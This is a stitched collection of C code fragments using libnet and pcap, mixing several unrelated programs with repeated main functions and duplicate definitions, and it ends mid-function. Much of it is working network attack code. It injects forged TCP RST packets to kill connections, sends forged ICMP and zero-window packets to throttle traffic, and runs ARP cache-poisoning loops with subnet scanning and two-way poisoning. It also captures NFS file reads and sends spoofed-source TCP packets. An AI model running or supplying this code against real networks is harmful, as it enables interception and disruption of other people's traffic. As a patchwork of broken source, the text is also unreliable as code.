static void
send_tcp_window_advertisement(libnet_t *l, struct libnet_ipv4_hdr *ip,
struct libnet_tcp_hdr *tcp)
{
int len;
ip->ip_hl = 5;
ip->ip_len = htons(LIBNET_IPV4_H + LIBNET_TCP_H);
ip->ip_id = libnet_get_prand(LIBNET_PRu16);
memcpy(buf, (u_char *)ip, LIBNET_IPV4_H);
tcp->th_off = 5;
tcp->th_win = htons(MIN_WIN);
memcpy(buf + LIBNET_IPV4_H, (u_char *)tcp, LIBNET_TCP_H);
libnet_do_checksum(l, buf, IPPROTO_TCP, LIBNET_TCP_H);
len = LIBNET_IPV4_H + LIBNET_TCP_H;
if (libnet_write_raw_ipv4(l, buf, len) != len)
warn("write");
fprintf(stderr, "%s:%d > %s:%d: . ack %lu win %d\n",
libnet_addr2name4(ip->ip_src.s_addr, 0), ntohs(tcp->th_sport),
libnet_addr2name4(ip->ip_dst.s_addr, 0), ntohs(tcp->th_dport),
ntohl(tcp->th_ack), 1);
}
static void
send_icmp_frag_needed(libnet_t *l, struct libnet_ipv4_hdr *ip)
{
struct libnet_icmpv4_hdr *icmp;
int len;
len = (ip->ip_hl * 4) + 8;
icmp = (struct libnet_icmpv4_hdr *)(buf + LIBNET_IPV4_H);
icmp->icmp_type = ICMP_UNREACH;
icmp->icmp_code = ICMP_UNREACH_NEEDFRAG;
icmp->hun.frag.pad = 0;
icmp->hun.frag.mtu = htons(MIN_MTU);
memcpy((u_char *)icmp + LIBNET_ICMPV4_MASK_H, (u_char *)ip, len);
len += LIBNET_ICMPV4_MASK_H;
libnet_build_ipv4(LIBNET_IPV4_H + len, 4,
libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_ICMP,
0, ip->ip_dst.s_addr, ip->ip_src.s_addr,
(u_int8_t *) icmp, len, l, 0);
if (libnet_write(l) != len)
warn("write");
fprintf(stderr, "%s > %s: icmp: ",
libnet_addr2name4(ip->ip_dst.s_addr, 0),
libnet_addr2name4(ip->ip_src.s_addr, 0));
fprintf(stderr, "%s unreachable - need to frag (mtu %d)\n",
libnet_addr2name4(ip->ip_src.s_addr, 0), MIN_MTU);
}
static void
send_icmp_source_quench(libnet_t *l, struct libnet_ipv4_hdr *ip)
{
struct libnet_icmpv4_hdr *icmp;
int len;
len = (ip->ip_hl * 4) + 8;
icmp = (struct libnet_icmpv4_hdr *)(buf + LIBNET_IPV4_H);
icmp->icmp_type = ICMP_SOURCEQUENCH;
icmp->icmp_code = 0;
memcpy((u_char *)icmp + LIBNET_ICMPV4_ECHO_H, (u_char *)ip, len);
len += LIBNET_ICMPV4_ECHO_H;
libnet_build_ipv4(LIBNET_IPV4_H + len, 0,
libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_ICMP,
0, ip->ip_dst.s_addr, ip->ip_src.s_addr,
(u_int8_t *) icmp, len, l, 0);
if (libnet_write(l) != len)
warn("write");
fprintf(stderr, "%s > %s: icmp: source quench\n",
libnet_addr2name4(ip->ip_dst.s_addr, 0),
libnet_addr2name4(ip->ip_src.s_addr, 0));
}
/*
* Checks to see if an IP is client or server by finding it in the tree
* returns SERVER or CLIENT.
* if mode = UNKNOWN, then abort on unknowns
* if mode = CLIENT, then unknowns become clients
* if mode = SERVER, then unknowns become servers
*/
int
check_ip_tree(const int mode, const unsigned long ip)
{
struct tree_type *node = NULL, *finder = NULL;
finder = new_tree();
finder->ip = ip;
node = RB_FIND(data_tree, &treeroot, finder);
if (node == NULL && mode == UNKNOWN)
errx(1, "%s (%lu) is an unknown system... aborting.!\n"
"Try a different auto mode (-n router|client|server)",
libnet_addr2name4(ip, RESOLVE), ip);
#ifdef DEBUG
if (node->type == SERVER) {
dbg(1, "Server: %s", libnet_addr2name4(ip, RESOLVE));
}
else if (node->type == CLIENT) {
dbg(1, "Client: %s", libnet_addr2name4(ip, RESOLVE));
}
else {
dbg(1, "Unknown: %s", libnet_addr2name4(ip, RESOLVE));
}
#endif
/* return node type if we found the node, else return the default (mode) */
if (node != NULL) {
return (node->type);
}
else {
return mode;
}
}
static void
tcp_kill_cb(u_char *user, const struct pcap_pkthdr *pcap, const u_char *pkt)
{
struct libnet_ipv4_hdr *ip;
struct libnet_tcp_hdr *tcp;
char ctext[64];
u_int32_t seq, win;
int i, len;
libnet_t *l;
l = (libnet_t *)user;
pkt += pcap_off;
len = pcap->caplen - pcap_off;
ip = (struct libnet_ipv4_hdr *)pkt;
if (ip->ip_p != IPPROTO_TCP)
return;
tcp = (struct libnet_tcp_hdr *)(pkt + (ip->ip_hl << 2));
if (tcp->th_flags & (TH_SYN|TH_FIN|TH_RST))
return;
seq = ntohl(tcp->th_ack);
win = ntohs(tcp->th_win);
snprintf(ctext, sizeof(ctext), "%s:%d > %s:%d:",
libnet_addr2name4(ip->ip_src.s_addr, LIBNET_DONT_RESOLVE),
ntohs(tcp->th_sport),
libnet_addr2name4(ip->ip_dst.s_addr, LIBNET_DONT_RESOLVE),
ntohs(tcp->th_dport));
for (i = 0; i < Opt_severity; i++) {
seq += (i * win);
libnet_clear_packet(l);
libnet_build_tcp(ntohs(tcp->th_dport), ntohs(tcp->th_sport),
seq, 0, TH_RST, 0, 0, 0, LIBNET_TCP_H,
NULL, 0, l, 0);
libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, 0,
libnet_get_prand(LIBNET_PRu16), 0, 64,
IPPROTO_TCP, 0, ip->ip_dst.s_addr,
ip->ip_src.s_addr, NULL, 0, l, 0);
if (libnet_write(l) < 0)
warn("write");
fprintf(stderr, "%s R %lu:%lu(0) win 0\n",
ctext,
(unsigned long) seq,
(unsigned long) seq);
}
++kill_counter;
if (Opt_max_kill && kill_counter >= Opt_max_kill) {
pcap_breakloop(pd);
}
}
static int
arp_send(libnet_t *l, int op, u_int8_t *sha,
in_addr_t spa, u_int8_t *tha, in_addr_t tpa)
{
int retval;
if (sha == NULL &&
(sha = (u_int8_t *)libnet_get_hwaddr(l)) == NULL) {
return (-1);
}
if (spa == 0) {
if ((spa = libnet_get_ipaddr4(l)) == -1)
return (-1);
}
if (tha == NULL)
tha = "\xff\xff\xff\xff\xff\xff";
libnet_autobuild_arp(op, sha, (u_int8_t *)&spa,
tha, (u_int8_t *)&tpa, l);
libnet_build_ethernet(tha, sha, ETHERTYPE_ARP, NULL, 0, l, 0);
fprintf(stderr, "%s ",
ether_ntoa((struct ether_addr *)sha));
if (op == ARPOP_REQUEST) {
fprintf(stderr, "%s 0806 42: arp who-has %s tell %s\n",
ether_ntoa((struct ether_addr *)tha),
libnet_addr2name4(tpa, LIBNET_DONT_RESOLVE),
libnet_addr2name4(spa, LIBNET_DONT_RESOLVE));
}
else {
fprintf(stderr, "%s 0806 42: arp reply %s is-at ",
ether_ntoa((struct ether_addr *)tha),
libnet_addr2name4(spa, LIBNET_DONT_RESOLVE));
fprintf(stderr, "%s\n",
ether_ntoa((struct ether_addr *)sha));
}
retval = libnet_write(l);
char *libnetError = libnet_geterror(l);
if (strlen(libnetError) > 0) {
fprintf(stderr, "%s", libnetError);
exit(1);
}
libnet_clear_packet(l);
return retval;
}
static void
nfs_save(struct tuple4 *addr, struct myreadargs *ma, u_char *buf, int len)
{
int fd;
warnx("%s.%d > %s.%d: %s (%d@%d)",
libnet_addr2name4(addr->daddr, LIBNET_DONT_RESOLVE), addr->dest,
libnet_addr2name4(addr->saddr, LIBNET_DONT_RESOLVE), addr->source,
ma->filename, len, ma->offset);
if ((fd = open(ma->filename, O_WRONLY|O_CREAT, 0644)) >= 0) {
if (lseek(fd, ma->offset, SEEK_SET) == ma->offset)
write(fd, buf, len);
}
close(fd);
}
int main() {
libnet_t *l; /* libnet context */
char errbuf[LIBNET_ERRBUF_SIZE];
u_int32_t ip_addr;
struct libnet_ether_addr *mac_addr;
l = libnet_init(LIBNET_RAW4, "eth0", errbuf);
if (l == NULL) {
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
ip_addr = libnet_get_ipaddr4(l);
if (ip_addr != -1)
printf("IP address: %s\n", libnet_addr2name4(ip_addr, LIBNET_DONT_RESOLVE));
else
fprintf(stderr, "Couldn't get own IP address: %s\n", libnet_geterror(l));
mac_addr = libnet_get_hwaddr(l);
if (mac_addr != NULL)
printf("MAC address: %02X:%02X:%02X:%02X:%02X:%02X\n",
mac_addr->ether_addr_octet[0], mac_addr->ether_addr_octet[1],
mac_addr->ether_addr_octet[2], mac_addr->ether_addr_octet[3],
mac_addr->ether_addr_octet[4], mac_addr->ether_addr_octet[5]);
else
fprintf(stderr, "Couldn't get own MAC address: %s\n", libnet_geterror(l));
libnet_destroy(l);
return 0;
}
void
add_tree(const unsigned long ip, const u_char * data)
{
struct tree_type *node = NULL, *newnode = NULL;
newnode = packet2tree(data);
if (newnode->type == UNKNOWN) {
/* couldn't figure out if packet was client or server */
dbg(2, "%s (%lu) unknown client/server",
libnet_addr2name4(newnode->ip, RESOLVE), newnode->ip);
}
/* try to find a simular entry in the tree */
node = RB_FIND(data_tree, &treeroot, newnode);
#ifdef DEBUG
if (debug > 2)
tree_printnode("add_tree", node);
#endif
/* new entry required */
if (node == NULL) {
/* increment counters */
if (newnode->type == SERVER) {
newnode->server_cnt++;
}
else if (newnode->type == CLIENT) {
newnode->client_cnt++;
}
/* insert it in */
RB_INSERT(data_tree, &treeroot, newnode);
}
else {
/* we found something, so update it */
dbg(2, " node: %p\nnewnode: %p", node, newnode);
#ifdef DEBUG
if (debug > 2)
tree_printnode("update node", node);
#endif
/* increment counter */
if (newnode->type == SERVER) {
node->server_cnt++;
}
else if (newnode->type == CLIENT) {
/* temp debug code */
node->client_cnt++;
}
/* didn't insert it, so free it */
free(newnode);
}
dbg(2, "------- START NEXT -------");
#ifdef DEBUG
if (debug > 2)
tree_print(&treeroot);
#endif
}
int
main(int argc, char *argv[])
{
extern char *optarg;
extern int optind;
char pcap_ebuf[PCAP_ERRBUF_SIZE];
char libnet_ebuf[LIBNET_ERRBUF_SIZE];
int c;
intf = NULL;
spoof_ip = target_ip = 0;
while ((c = getopt(argc, argv, "i:t:h?V")) != -1) {
switch (c) {
case 'i':
intf = optarg;
break;
case 't':
if ((target_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
usage();
break;
default:
usage();
}
}
argc -= optind;
argv += optind;
if (argc != 1)
usage();
if ((spoof_ip = libnet_name2addr4(l, argv[0], LIBNET_RESOLVE)) == -1)
usage();
if (intf == NULL && (intf = pcap_lookupdev(pcap_ebuf)) == NULL)
errx(1, "%s", pcap_ebuf);
if ((l = libnet_init(LIBNET_LINK, intf, libnet_ebuf)) == NULL)
errx(1, "%s", libnet_ebuf);
if (target_ip != 0 && !arp_find(target_ip, &target_mac))
errx(1, "couldn't arp for host %s",
libnet_addr2name4(target_ip, LIBNET_DONT_RESOLVE));
signal(SIGHUP, cleanup);
signal(SIGINT, cleanup);
signal(SIGTERM, cleanup);
for (;;) {
arp_send(l, ARPOP_REPLY, NULL, spoof_ip,
(target_ip ? (u_int8_t *)&target_mac : NULL),
target_ip);
sleep(2);
}
/* NOTREACHED */
exit(0);
}
static int
arp_send(libnet_t *l, int op,
u_int8_t *sha, in_addr_t spa,
u_int8_t *tha, in_addr_t tpa,
u_int8_t *me)
{
int retval;
if (!me) me = sha;
libnet_autobuild_arp(op, sha, (u_int8_t *)&spa,
tha, (u_int8_t *)&tpa, l);
libnet_build_ethernet(tha, me, ETHERTYPE_ARP, NULL, 0, l, 0);
fprintf(stderr, "%s ",
ether_ntoa((struct ether_addr *)me));
if (op == ARPOP_REQUEST) {
fprintf(stderr, "%s 0806 42: arp who-has %s tell %s\n",
ether_ntoa((struct ether_addr *)tha),
libnet_addr2name4(tpa, LIBNET_DONT_RESOLVE),
libnet_addr2name4(spa, LIBNET_DONT_RESOLVE));
}
else {
fprintf(stderr, "%s 0806 42: arp reply %s is-at ",
ether_ntoa((struct ether_addr *)tha),
libnet_addr2name4(spa, LIBNET_DONT_RESOLVE));
fprintf(stderr, "%s\n",
ether_ntoa((struct ether_addr *)sha));
}
retval = libnet_write(l);
if (retval)
fprintf(stderr, "%s", libnet_geterror(l));
libnet_clear_packet(l);
return retval;
}
static void
tree_printnode(const char *name, const struct tree_type *node)
{
if (node == NULL) {
fprintf(stderr, "%s node is null\n", name);
}
else {
fprintf(stderr, "-- %s: %p\nIP: %s\nMask: %d\nSrvr: %d\nClnt: %d\n",
name, (void *)node, libnet_addr2name4(node->ip, RESOLVE),
node->masklen, node->server_cnt, node->client_cnt);
if (node->type == SERVER) {
fprintf(stderr, "Type: Server\n--\n");
}
else {
fprintf(stderr, "Type: Client\n--\n");
}
}
}
/*
* tree_comp(), called by rbsearch compares two treees and returns:
* 1 = first > second
* -1 = first < second
* 0 = first = second
* based upon the ip address stored
*
*/
int
tree_comp(struct tree_type *t1, struct tree_type *t2)
{
if (t1->ip > t2->ip) {
dbg(2, "%s > %s", libnet_addr2name4(t1->ip, RESOLVE),
libnet_addr2name4(t2->ip, RESOLVE));
return 1;
}
if (t1->ip < t2->ip) {
dbg(2, "%s < %s", libnet_addr2name4(t1->ip, RESOLVE),
libnet_addr2name4(t2->ip, RESOLVE));
return -1;
}
dbg(2, "%s = %s", libnet_addr2name4(t1->ip, RESOLVE),
libnet_addr2name4(t2->ip, RESOLVE));
return 0;
}
int
main(int argc, char *argv[])
{
extern char *optarg;
extern int optind;
char pcap_ebuf[PCAP_ERRBUF_SIZE];
char libnet_ebuf[LIBNET_ERRBUF_SIZE];
int c;
int n_scan_hosts = 0;
char *scan_prefix = NULL;
int scan_prefix_length = 32;
char *cleanup_src = NULL;
in_addr_t target_addr;
intf = NULL;
poison_reverse = 0;
poison_mesh = 0;
n_hosts = 0;
/* allocate enough memory for target list */
hosts = calloc( argc+1, sizeof(struct host) );
while ((c = getopt(argc, argv, "vrmi:s:t:c:h?V")) != -1) {
switch (c) {
case 'v':
verbose = 1;
break;
case 'i':
intf = optarg;
break;
case 't':
target_addr = libnet_name2addr4(l, optarg, LIBNET_RESOLVE);
if (target_addr == -1) {
usage();
} else {
host_add(target_addr, HOST_TARGET);
}
break;
case 'r':
poison_reverse = 1;
break;
case 'm':
poison_mesh = 1;
break;
case 's':
scan_prefix = strchr(optarg, '/');
if (scan_prefix) {
*scan_prefix = '\0';
scan_prefix_length = atoi(scan_prefix+1);
if (scan_prefix_length < 0 || scan_prefix_length > 32) {
usage();
}
}
n_scan_hosts += (1<<(32-scan_prefix_length));
/* we need some more memory to store the target data */
int mem = (argc+1 + n_scan_hosts) * sizeof(struct host);
hosts = realloc( hosts, mem );
hosts[n_hosts].ip = (uint32_t)0;
subnet_add(inet_addr(optarg), scan_prefix_length, HOST_TARGET);
break;
case 'c':
cleanup_src = optarg;
break;
default:
usage();
}
}
argc -= optind;
argv += optind;
if (!cleanup_src || strcmp(cleanup_src, "own")==0) { /* default! */
/* only use our own hw address when cleaning up,
* not jeopardizing any bridges on the way to our
* target
*/
cleanup_src_own = 1;
cleanup_src_host = 0;
} else if (strcmp(cleanup_src, "host")==0) {
/* only use the target hw address when cleaning up;
* this can screw up some bridges and scramble access
* for our own host, however it resets the arp table
* more reliably
*/
cleanup_src_own = 0;
cleanup_src_host = 1;
} else if (strcmp(cleanup_src, "both")==0) {
cleanup_src_own = 1;
cleanup_src_host = 1;
} else {
errx(1, "Invalid parameter to -c: use 'own' (default), 'host' or 'both'.");
usage();
}
while (argc--) {
if ((target_addr = libnet_name2addr4(l, argv[0], LIBNET_RESOLVE)) == -1) {
errx(1, "Invalid address: %s", argv[0]);
usage();
}
host_add(target_addr, HOST_MODEL);
argv++;
}
if (poison_mesh) {
struct host *host = hosts;
for(;host->ip; host++) {
host->flags |= (HOST_TARGET|HOST_MODEL);
}
}
if (poison_reverse && active_targets() <= 0) {
errx(1, "Spoofing the reverse path (-r) is only available when specifying at least one target (-t/-s).");
usage();
}
if (intf == NULL && (intf = pcap_lookupdev(pcap_ebuf)) == NULL)
errx(1, "%s", pcap_ebuf);
if ((l = libnet_init(LIBNET_LINK, intf, libnet_ebuf)) == NULL)
errx(1, "%s", libnet_ebuf);
fprintf(stderr, "Scanning %d hw addresses...\n", n_hosts);
struct host *target = hosts;
for (; target->ip; target++) {
if (verbose) {
fprintf(stderr, "Looking up host %s...\n", libnet_addr2name4(target->ip, LIBNET_DONT_RESOLVE));
}
int arp_status = arp_find(target->ip, &target->mac);
if (arp_status &&
/* just make sure we are not getting an empty or broadcast address */
(memcmp(&target->mac, zero_ha, sizeof(struct ether_addr)) != 0) &&
(memcmp(&target->mac, brd_ha, sizeof(struct ether_addr)) != 0)) {
target->flags |= HOST_ACTIVE;
if (target->flags & HOST_SUBNET) {
fprintf(stderr, "Found host in subnet %s: %s\n", libnet_addr2name4(target->ip, LIBNET_DONT_RESOLVE), ether_ntoa((struct ether_addr *)&target->mac));
}
} else {
target->flags &= (~HOST_ACTIVE);
if (! (target->flags & HOST_SUBNET)) {
fprintf(stderr, "Unable to find specified host %s\n", libnet_addr2name4(target->ip, LIBNET_DONT_RESOLVE));
}
if (poison_reverse && target->flags & HOST_MODEL) {
errx(1, "couldn't arp for spoof host %s",
libnet_addr2name4(target->ip, LIBNET_DONT_RESOLVE));
usage();
}
}
}
if ((my_ha = (u_int8_t *)libnet_get_hwaddr(l)) == NULL) {
errx(1, "Unable to determine own mac address");
}
if (active_targets() == 0) {
errx(1, "No target hosts found.");
}
signal(SIGHUP, cleanup);
signal(SIGINT, cleanup);
signal(SIGTERM, cleanup);
fprintf(stderr, "Starting spoofing process...\n");
for (;;) {
struct host *target = hosts;
for(;target->ip; target++) {
if (!(target->flags & HOST_TARGET)) continue;
if (!(target->flags & HOST_ACTIVE)) continue;
struct host *model = hosts;
for (;model->ip; model++) {
if (!(model->flags & HOST_ACTIVE)) continue;
if (!(model->flags & HOST_MODEL)) continue;
if (target->ip != model->ip) {
arp_send(l, ARPOP_REPLY, my_ha, model->ip,
(target->ip ? (u_int8_t *)&target->mac : brd_ha),
target->ip,
my_ha);
usleep(ARP_PAUSE);
if (poison_reverse) {
arp_send(l, ARPOP_REPLY, my_ha, target->ip, (uint8_t *)&model->mac, model->ip, my_ha);
usleep(ARP_PAUSE);
}
}
}
}
sleep(2);
}
/* NOTREACHED */
exit(0);
}
struct tree_type *
packet2tree(const u_char * data)
{
struct tree_type *node = NULL;
eth_hdr_t *eth_hdr = NULL;
ip_hdr_t ip_hdr;
tcp_hdr_t tcp_hdr;
udp_hdr_t udp_hdr;
icmp_hdr_t icmp_hdr;
dns_hdr_t dns_hdr;
node = new_tree();
eth_hdr = (eth_hdr_t *) (data);
/* prevent issues with byte alignment, must memcpy */
memcpy(&ip_hdr, (data + LIBNET_ETH_H), LIBNET_IP_H);
/* copy over the source mac */
strncpy((char *)node->mac, (char *)eth_hdr->ether_shost, 6);
/* copy over the source ip */
node->ip = ip_hdr.ip_src.s_addr;
/*
* TCP
*/
if (ip_hdr.ip_p == IPPROTO_TCP) {
dbg(1, "%s uses TCP... ",
libnet_addr2name4(ip_hdr.ip_src.s_addr, RESOLVE));
/* memcpy it over to prevent alignment issues */
memcpy(&tcp_hdr, (data + LIBNET_ETH_H + (ip_hdr.ip_hl * 4)),
LIBNET_TCP_H);
/* ftp-data is going to skew our results so we ignore it */
if (tcp_hdr.th_sport == 20) {
return (node);
}
/* set TREE->type based on TCP flags */
if (tcp_hdr.th_flags == TH_SYN) {
node->type = CLIENT;
dbg(1, "is a client");
}
else if (tcp_hdr.th_flags == (TH_SYN | TH_ACK)) {
node->type = SERVER;
dbg(1, "is a server");
}
else {
dbg(1, "is an unknown");
}
/*
* UDP
*/
}
else if (ip_hdr.ip_p == IPPROTO_UDP) {
/* memcpy over to prevent alignment issues */
memcpy(&udp_hdr, (data + LIBNET_ETH_H + (ip_hdr.ip_hl * 4)),
LIBNET_UDP_H);
dbg(1, "%s uses UDP... ",
libnet_addr2name4(ip_hdr.ip_src.s_addr, RESOLVE));
switch (ntohs(udp_hdr.uh_dport)) {
case 0x0035: /* dns */
/* prevent memory alignment issues */
memcpy(&dns_hdr,
(data + LIBNET_ETH_H + (ip_hdr.ip_hl * 4) + LIBNET_UDP_H),
LIBNET_DNS_H);
if (dns_hdr.flags & DNS_QUERY_FLAG) {
/* bit set, response */
node->type = SERVER;
dbg(1, "is a dns server");
}
else {
/* bit not set, query */
node->type = CLIENT;
dbg(1, "is a dns client");
}
return (node);
break;
default:
break;
}
switch (ntohs(udp_hdr.uh_sport)) {
case 0x0035: /* dns */
/* prevent memory alignment issues */
memcpy(&dns_hdr,
(data + LIBNET_ETH_H + (ip_hdr.ip_hl * 4) + LIBNET_UDP_H),
LIBNET_DNS_H);
if (dns_hdr.flags & DNS_QUERY_FLAG) {
/* bit set, response */
node->type = SERVER;
dbg(1, "is a dns server");
}
else {
/* bit not set, query */
node->type = CLIENT;
dbg(1, "is a dns client");
}
return (node);
break;
default:
dbg(1, "unknown UDP protocol: %hu->%hu", udp_hdr.uh_sport,
udp_hdr.uh_dport);
break;
}
/*
* ICMP
*/
}
else if (ip_hdr.ip_p == IPPROTO_ICMP) {
/* prevent alignment issues */
memcpy(&icmp_hdr, (data + LIBNET_ETH_H + (ip_hdr.ip_hl * 4)),
LIBNET_ICMP_H);
dbg(1, "%s uses ICMP... ",
libnet_addr2name4(ip_hdr.ip_src.s_addr, RESOLVE));
/*
* if port unreachable, then source == server, dst == client
*/
if ((icmp_hdr.icmp_type == ICMP_UNREACH) &&
(icmp_hdr.icmp_code == ICMP_UNREACH_PORT)) {
node->type = SERVER;
dbg(1, "is a server with a closed port");
}
}
return (node);
}
int main(int argc, char** argv){
libnet_t *l; //libnet context
char errbuf[LIBNET_ERRBUF_SIZE];
char ip_addr_str[16], mac_addr_str[18];
u_int32_t ip_addr;
u_int8_t *ip_addr_p, *mac_addr;
int i, length; //for libnet_hex_aton
if( argc <= 1 ){
fprintf(stderr, "Usage: %s <iface>\n", argv[0]);
exit(EXIT_FAILURE);
}
l = libnet_init(LIBNET_RAW4 /*inj. type*/, argv[1] /* iface */, errbuf);
if( l == NULL ){
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
//IP addr
printf("IP addr: ");
scanf("%15s", ip_addr_str);
ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_RESOLVE);
if( ip_addr != -1 ){ //no error
//libnet always deals with stuff in network order
/* Check your system's endianess: */
ip_addr_p = (u_int8_t*)(&ip_addr);
printf("ip_addr: %08X\n", ip_addr);
printf("ip_addr_p: %02X %02X %02X %02X\n", ip_addr_p[0],\
ip_addr_p[1], ip_addr_p[2], ip_addr_p[3]);
printf("Address as per addr2name4: %s\n", \
libnet_addr2name4(ip_addr, LIBNET_DONT_RESOLVE));
}
else{
fprintf(stderr, "Error converting IP\n");
}
// MAC addr
printf("MAC address: ");
scanf("%17s", mac_addr_str);
mac_addr = libnet_hex_aton((int8_t*)mac_addr_str, &length);
if( mac_addr != NULL) {
printf("Address read: ");
for ( i=0; i < length; i++) {
printf("%02X", mac_addr[i]);
if ( i < length-1 )
printf(":");
}
printf("\n");
// Remember to free the memory allocated by libnet_hex_aton()
free(mac_addr);
}
else{
fprintf(stderr, "Error converting MAC address.\n");
}
libnet_destroy(l);
return 0;
}
void
drench_send_tcp(pkt_t *dp, u_int8_t offset, u_char *pkt)
{
struct ether_header *eh = NULL;
struct ip *ih = NULL;
struct tcphdr *th = NULL;
char *state = NULL;
in_port_t sport = 0;
size_t paylen = 0;
u_int32_t isn = 0;
if (dp->payload != NULL)
paylen = strlen(dp->payload);
state = TCP_PHASE(dp->flags, "S", "A");
if (pkt != NULL) {
eh = (struct ether_header *)pkt;
ih = (struct ip *)(pkt + sizeof(struct ether_header));
th = (struct tcphdr *)(pkt + sizeof(struct ether_header) + sizeof(struct ip));
isn = th->th_ack;
sport = th->th_dport;
}
else {
sport = libnet_get_prand(LIBNET_PRu16);
}
/* Sanity check: check the ack number of the packet to
* make sure we sent it. We can do this by performing
* a calculation on the sequence number we
* send, based on a "secret" random number */
if (check_isn(dp, sport, &isn) < 0) {
(void)fprintf(stdout,
"(C->S)[%s] SRC = %15s:%-6u DST = %15s:%-6u INVALID ISN in ACK%s [isn = %u]\n",
state,
TCP_PHASE(
dp->flags,
dp->saddr,
libnet_addr2name4(ih->ip_dst.s_addr, LIBNET_DONT_RESOLVE)
),
sport,
TCP_PHASE(
dp->flags,
dp->daddr,
libnet_addr2name4(ih->ip_src.s_addr, LIBNET_DONT_RESOLVE)
),
dp->dport,
(dp->opts & O_CHKISN ? ", DROPPING PACKET" : ""),
isn);
if (dp->opts & O_CHKISN)
return;
}
LIBNET_ERR(dp->p_tcp = libnet_build_tcp(
TCP_PHASE(dp->flags, sport, th->th_dport), /* Source port */
dp->dport, /* Destination port */
TCP_PHASE(dp->flags, isn, (th->th_ack + paylen)), /* ISN */
/* Sniffed packet's seq num */
TCP_PHASE(dp->flags, 0, (th->th_seq + 1)), /* ACK */
TCP_PHASE(dp->flags, dp->flags, dp->flags /*| TH_PUSH*/), /* Control flags */
dp->winsize, /* window size */
0, /* auto checksum */
0, /* Urgent data pointer */
TCP_PHASE(dp->flags, LIBNET_TCP_H, LIBNET_TCP_H + paylen), /* total packet length */
TCP_PHASE(dp->flags, NULL, (u_char *)dp->payload), /* payload */
TCP_PHASE(dp->flags, 0, paylen), /* payload size */
dp->l, /* libnet context */
dp->p_tcp /* ptag */
));
LIBNET_ERR(dp->p_ip = libnet_build_ipv4(
TCP_PHASE(dp->flags, LIBNET_IPV4_H + LIBNET_TCP_H, LIBNET_IPV4_H + LIBNET_TCP_H + paylen),
TCP_PHASE(dp->flags, 0, IPTOS_LOWDELAY), /* TOS */
libnet_get_prand(LIBNET_PRu16),
0, /* Frag */
MAX_TTL, /* TTL */
IPPROTO_TCP, /* Protocol */
0, /* auto checksum */
TCP_PHASE(dp->flags, htonl(ntohl(libnet_name2addr4(dp->l, dp->saddr, LIBNET_DONT_RESOLVE)) + offset),
ih->ip_dst.s_addr), /* XXX error check, source */
TCP_PHASE(dp->flags, libnet_name2addr4(dp->l, dp->daddr, LIBNET_DONT_RESOLVE),
ih->ip_src.s_addr), /* XXX error check, destination */
NULL, /* payload */
0, /* payload size */
dp->l, /* libnet context */
dp->p_ip /* libnet ptag */
));
if (libnet_write(dp->l) == -1)
state = "x";
(void)fprintf(stdout, "(C->S)[%s] SRC = %15s:%-6u DST = %15s:%-6u\n", state,
TCP_PHASE(
dp->flags,
libnet_addr2name4(
htonl(ntohl(libnet_name2addr4(dp->l, dp->saddr, LIBNET_DONT_RESOLVE)) + offset),
LIBNET_DONT_RESOLVE
),
libnet_addr2name4(ih->ip_dst.s_addr, LIBNET_DONT_RESOLVE)
),
sport,
TCP_PHASE(
dp->flags,
dp->daddr,
libnet_addr2name4(ih->ip_src.s_addr, LIBNET_DONT_RESOLVE)
),
dp->dport);
(void)fflush(stdout);
}
int main(int argc, char* argv[]) {
libnet_t *l; /* libnet context */
char errbuf[LIBNET_ERRBUF_SIZE];
u_int32_t ip_addr;
struct libnet_ether_addr *mac_addr;
l = libnet_init(LIBNET_RAW4, NULL, errbuf);
uint8_t *dst_mac, *ether_frame;
int sd, sd2, sd3, frame_length, bytes;
uint8_t *ether_frame2;
struct sockaddr_ll device;
arp_hdr arphdr_send;
arp_hdr *arphdr_receive;
ether_frame = (uint8_t *)malloc(IP_MAXPACKET * sizeof(uint8_t));
ether_frame2 = (uint8_t *)malloc(IP_MAXPACKET * sizeof(uint8_t));
memset(ether_frame, 0, IP_MAXPACKET * sizeof(uint8_t));
char buff[1024];
char buff2[1024];
int count = 0;
pthread_t p_thread[2];
int thr_id, thr_id2;
char str[256];
/* get gateway address */
FILE *in = popen("route", "r");
for (int i = 0; i < 3; i++) {
fgets(buff, sizeof(buff), in);
}
while (buff[count] != ' ') count++;
while (buff[count] == ' ') count++;
inet_aton(buff + count, &gw_ip_addr);
printf("\n [+]Gateway IP Adress : %s\n", inet_ntoa(gw_ip_addr));
pclose(in);
/*
Address HWtype HWaddress Flags Mask Iface
192.168.230.2 ether 00:50:56:f4:44:1d C ens33
*/
sprintf(str, "arp %s",inet_ntoa(gw_ip_addr));
FILE *in2 = popen(str, "r");
count=0;
fgets(buff2, sizeof(buff2), in);
fgets(buff2, sizeof(buff2), in);
while (buff2[count] != ' ') count++;
while (buff2[count] == ' ') count++;
while (buff2[count] != ' ') count++;
while (buff2[count] == ' ') count++;
gw_mac_addr=ether_aton(buff2 + count);
pclose(in2);
printf("\n [+]PRINT REQUEST_PACKET\n");
struct in_addr target_ip_addr;
inet_aton(argv[1], &target_ip_addr);
printf("target IP Adress : %s\n", inet_ntoa(target_ip_addr));
///////////////////// 0.get my attacker's mac , ip ////////////////////////////////
if (l == NULL) {
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
/* get ip address */
ip_addr = libnet_get_ipaddr4(l);
if (ip_addr != 0xff)
printf("Src IP address: %s\n", libnet_addr2name4(ip_addr, \
LIBNET_DONT_RESOLVE));
else
fprintf(stderr, "Couldn't get own IP address: %s\n", \
libnet_geterror(l));
/* get mac address */
mac_addr = libnet_get_hwaddr(l);
if (mac_addr != NULL)
printf("Src MAC address: %02X:%02X:%02X:%02X:%02X:%02X\n", \
mac_addr->ether_addr_octet[0], \
mac_addr->ether_addr_octet[1], \
mac_addr->ether_addr_octet[2], \
mac_addr->ether_addr_octet[3], \
mac_addr->ether_addr_octet[4], \
mac_addr->ether_addr_octet[5]);
else
fprintf(stderr, "Couldn't get own MAC address: %s\n", \
libnet_geterror(l));
libnet_destroy(l);
// Submit request for a raw socket descriptor.
